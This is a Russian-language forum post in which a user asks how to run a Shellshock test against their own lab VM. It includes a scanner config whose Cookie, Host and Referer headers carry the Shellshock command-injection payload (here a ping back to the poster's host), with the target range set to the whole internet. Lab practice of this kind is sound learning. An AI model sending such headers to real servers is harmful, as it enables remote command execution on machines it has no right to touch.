Уважаемые форумчане, помогите. Хочу проэксплуатировать уязвимость shellshock. На виртуалке (с IP-адресом 192.168.1.1) я развернул ОС с этой уязвимостью, и веб-сервер. Как мне выполнить нижеприведенный скрипт с хостовой системы (c IP адресом 192.168.1.2), что бы он был как HTTP-запрос ?
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 192.168.1.2
http-header = Host:() { :; }; ping -c 3 192.168.1.2
http-header = Referer:() { :; }; ping -c 3 192.168.1.2
